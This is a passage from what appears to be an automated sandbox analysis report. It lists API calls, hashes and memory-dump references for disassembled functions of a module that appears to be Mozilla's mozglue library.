                                                                                                                                                        • Opcode Fuzzy Hash: 53ad387ea0c337a5922d5366ce98c118a12b629ff1d9f040c59d094f51a0be83
                                                                                                                                                        • Instruction Fuzzy Hash: 9EE0B6707063829BDF049F66E958B157FEDEB06324F1C006AAD0682240EBB8C006CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B0DC1DE,?,00000000,?,00000000,?,6B08779F), ref: 6B0DC1F8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6B0DC217
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B0DC1DE,?,00000000,?,00000000,?,6B08779F), ref: 6B0DC22C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-2991032369
                                                                                                                                                        • Opcode ID: 4bdfb345316d6504133c964c020dc687331f3a5e84e954f5dbf99e585a24eb73
                                                                                                                                                        • Instruction ID: 95a828dc7704b5ca66d7bf615497850322455e31c2dfb0e36a5c0e5c7587efad
                                                                                                                                                        • Opcode Fuzzy Hash: 4bdfb345316d6504133c964c020dc687331f3a5e84e954f5dbf99e585a24eb73
                                                                                                                                                        • Instruction Fuzzy Hash: 8DE0B6746423819BEF046F65E90871A7FEDAB16304F000129ED05C2781E7B9C002CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B0860F4
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B086180
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B086211
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6B086229
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B08625E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6B085FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B086271
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                        • Opcode ID: c0017464df1d4614e7756798cd3fa20f0cc005e50e0660fa3e757906222597c9
                                                                                                                                                        • Instruction ID: 37c25cd1c7127839cba2c0f3cba142b3c16874312f38a9c73dbea260e80d2b92
                                                                                                                                                        • Opcode Fuzzy Hash: c0017464df1d4614e7756798cd3fa20f0cc005e50e0660fa3e757906222597c9
                                                                                                                                                        • Instruction Fuzzy Hash: 2C519CB1A102068FEF18CFA8D89176EBBF5EF49304F160479CA169B311E739EA15CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6B085820,?), ref: 6B0BD21F
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,6B085820,?), ref: 6B0BD22E
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6B085820,?), ref: 6B0BD242
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,6B085820,?), ref: 6B0BD253
                                                                                                                                                          • Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
                                                                                                                                                          • Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
                                                                                                                                                          • Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6B085820,?), ref: 6B0BD280
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2029485308-0
                                                                                                                                                        • Opcode ID: 623bcddc6512946363d3210f71d32a53145dd6d9b9299e0af9412b4836f92438
                                                                                                                                                        • Instruction ID: f2fe94d93375cce84aeae699a362e7d75e36c124f451e54d3aa358e464de45c6
                                                                                                                                                        • Opcode Fuzzy Hash: 623bcddc6512946363d3210f71d32a53145dd6d9b9299e0af9412b4836f92438
                                                                                                                                                        • Instruction Fuzzy Hash: 3131A2B5940255ABCB08CF68C881B6EFFB6BF99704F2441A9D9546B301D37BE902C7E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6B08C1BC
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B08C1DC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1885715127-0
                                                                                                                                                        • Opcode ID: ca14059a3f1455da410988ddda7d45a35dc724d0a927e1a5a5cf9992c21ba9df
                                                                                                                                                        • Instruction ID: f40a1896c9b75d30eb94d65032014c357ac8edc6917c22d9376b3441f18ab69e
                                                                                                                                                        • Opcode Fuzzy Hash: ca14059a3f1455da410988ddda7d45a35dc724d0a927e1a5a5cf9992c21ba9df
                                                                                                                                                        • Instruction Fuzzy Hash: 8D41B3B1D083408FDB24CF68D48175ABFF4BF9A704F408A6DE8899B252E734D944CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF770), ref: 6B0DA858
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6B0DA87B
                                                                                                                                                          • Part of subcall function 6B0DA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6B0DA88F,00000000), ref: 6B0DA9F1
                                                                                                                                                        • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6B0DA8FF
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6B0DA90C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF770), ref: 6B0DA97E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1355178011-0
                                                                                                                                                        • Opcode ID: 0b53e04d99ffdc6793419aa8a153aa6ccf3eca9cd2138a17553476bf77d56feb
                                                                                                                                                        • Instruction ID: c6c91205cd411c6b4d0cd95424d4b7555ea9e2b5ade5abf625e08f5344311193
                                                                                                                                                        • Opcode Fuzzy Hash: 0b53e04d99ffdc6793419aa8a153aa6ccf3eca9cd2138a17553476bf77d56feb
                                                                                                                                                        • Instruction Fuzzy Hash: BE4160B0A003449FDB08DFA8D845B9DBF75FF08324F148619E926AB3C1D7799942CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000010,?,6B0742D2), ref: 6B07436A
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6B0742D2), ref: 6B074387
                                                                                                                                                        • moz_xmalloc.MOZGLUE(80000023,?,6B0742D2), ref: 6B0743B7
                                                                                                                                                        • free.MOZGLUE(00000000,?,6B0742D2), ref: 6B0743EF
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6B0742D2), ref: 6B074406
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2563754823-0
                                                                                                                                                        • Opcode ID: de336ce16b75ae8960237915f4d169e4a3edc6e53f906ce02ca05cc8ed868425
                                                                                                                                                        • Instruction ID: 84682bab369ecb4c168cac5526678ba2a68ee09e5a981f0713b42db5b5f1ae8a
                                                                                                                                                        • Opcode Fuzzy Hash: de336ce16b75ae8960237915f4d169e4a3edc6e53f906ce02ca05cc8ed868425
                                                                                                                                                        • Instruction Fuzzy Hash: 5D31EA71A001156FD72CEE799C9076EFFE6FB44224B140B79E919DB384E734E9008795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BBC
                                                                                                                                                          • Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
                                                                                                                                                          • Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67
                                                                                                                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BCA
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BD5
                                                                                                                                                          • Part of subcall function 6B095C50: __aulldiv.LIBCMT ref: 6B095DB4
                                                                                                                                                          • Part of subcall function 6B095C50: LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B095DED
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0D0BE2
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0D0C9A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168180809-0
                                                                                                                                                        • Opcode ID: 023d4c7bcdc1058d51feb8af8762a9f6fe56edb8ad8290368facf1433a6902a5
                                                                                                                                                        • Instruction ID: 586adbd1906a567b176233e3ace502f334ffd1c0897e262c6696861314ecf520
                                                                                                                                                        • Opcode Fuzzy Hash: 023d4c7bcdc1058d51feb8af8762a9f6fe56edb8ad8290368facf1433a6902a5
                                                                                                                                                        • Instruction Fuzzy Hash: 4131E6719187148BC718DF39949021BBBE8FF827A0F505B1EF869A72D0EB74D8458B92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE744,ewk,00000000,ewk,?,6B096112), ref: 6B0739AF
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE744,?,6B096112), ref: 6B073A34
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE784,6B096112), ref: 6B073A4B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073A5F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID: ewk
                                                                                                                                                        • API String ID: 3168844106-332161125
                                                                                                                                                        • Opcode ID: ed876797ca8d00dbb296eedd6ae36c21b7389d37f39e68e1c517fd89d3f1f070
                                                                                                                                                        • Instruction ID: 6d857f269ead2d4e0241d7fbe0222d5cf0f4b0181cbee9bdf32f79cd3174b3ae
                                                                                                                                                        • Opcode Fuzzy Hash: ed876797ca8d00dbb296eedd6ae36c21b7389d37f39e68e1c517fd89d3f1f070
                                                                                                                                                        • Instruction Fuzzy Hash: 722126327017018FDB3CDA65D842B19BFE9EB897107194579DD6583680DB38E8038B46
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0863D0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32 ref: 6B0863DF
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6B08640E
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B086467
                                                                                                                                                        • ??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6B0864A8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3202982786-0
                                                                                                                                                        • Opcode ID: d80d60f58ab9407c47d5a1444c155d153792d070af2fd9e4c822dc09d167de81
                                                                                                                                                        • Instruction ID: a48a661cc2174286b1c2f29a238298390676cdf54a435d796c86031f9e9cbe84
                                                                                                                                                        • Opcode Fuzzy Hash: d80d60f58ab9407c47d5a1444c155d153792d070af2fd9e4c822dc09d167de81
                                                                                                                                                        • Instruction Fuzzy Hash: 503147B1A152448FDB08DF68E08575ABFE9FB86218F12482EDC9987341D738E485CB63
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6B0D9B74
                                                                                                                                                        • ?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6B0D9BBA
                                                                                                                                                        • ?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6B0D9BC8
                                                                                                                                                        • ??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6B0D9BD7
                                                                                                                                                        • ??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6B0D9BE0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2380687156-0
                                                                                                                                                        • Opcode ID: 7d6cee923e3343f4fc7a32cff94a1275feeed3a18f3abe52b2912a4b7bd77b99
                                                                                                                                                        • Instruction ID: d0802f6a82afcd6f743d5da3223f487a4d3c31be248affe2cb9206197c528441
                                                                                                                                                        • Opcode Fuzzy Hash: 7d6cee923e3343f4fc7a32cff94a1275feeed3a18f3abe52b2912a4b7bd77b99
                                                                                                                                                        • Instruction Fuzzy Hash: 5E118232914348A7C704AF788D519AFBBB8FFC6364F405A0DF99947182EB35D544C792
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 6B0D586C
                                                                                                                                                        • CloseHandle.KERNEL32 ref: 6B0D5878
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6B0D5898
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0D58C9
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0D58D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1910681409-0
                                                                                                                                                        • Opcode ID: e5e03cd4cd2236469a58e3540240a9e2b31cfa978b571aabfe8b67363effb391
                                                                                                                                                        • Instruction ID: a7173ef039345d2c0b1e80af6dcb3449df2d86e6542b7e43d3582120c3f59ff0
                                                                                                                                                        • Opcode Fuzzy Hash: e5e03cd4cd2236469a58e3540240a9e2b31cfa978b571aabfe8b67363effb391
                                                                                                                                                        • Instruction Fuzzy Hash: ED01FBB5B062019BDB049F2AF808B067FBDEB83B257644176EF1AD2290D735D919CF81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B0D1800
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                          • Part of subcall function 6B074290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6B0B3EBD,6B0B3EBD,00000000), ref: 6B0742A9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                        • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                        • API String ID: 46770647-1733325692
                                                                                                                                                        • Opcode ID: 8169b5ed06e7926f2a08ae6c242d49172432d79ddb3b71a89cff72627dece679
                                                                                                                                                        • Instruction ID: b6639c7cefa05a06ff7b1346e07030c811d6d82e2b10898843dd8d0b17abb4af
                                                                                                                                                        • Opcode Fuzzy Hash: 8169b5ed06e7926f2a08ae6c242d49172432d79ddb3b71a89cff72627dece679
                                                                                                                                                        • Instruction Fuzzy Hash: 7671F370A003469FD708DF38E49175ABFB5FF45300F404669D8195B781DB78AA95CBE2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010,00000000,?,?,6B0DAB1F), ref: 6B0DB1F2
                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010,00000000,?), ref: 6B0DB1FF
                                                                                                                                                        • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6B0DB0A6,6B0DB0A6,?,6B0DAF67,?,00000010,?,6B0DAF67,?,00000010), ref: 6B0DB25F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
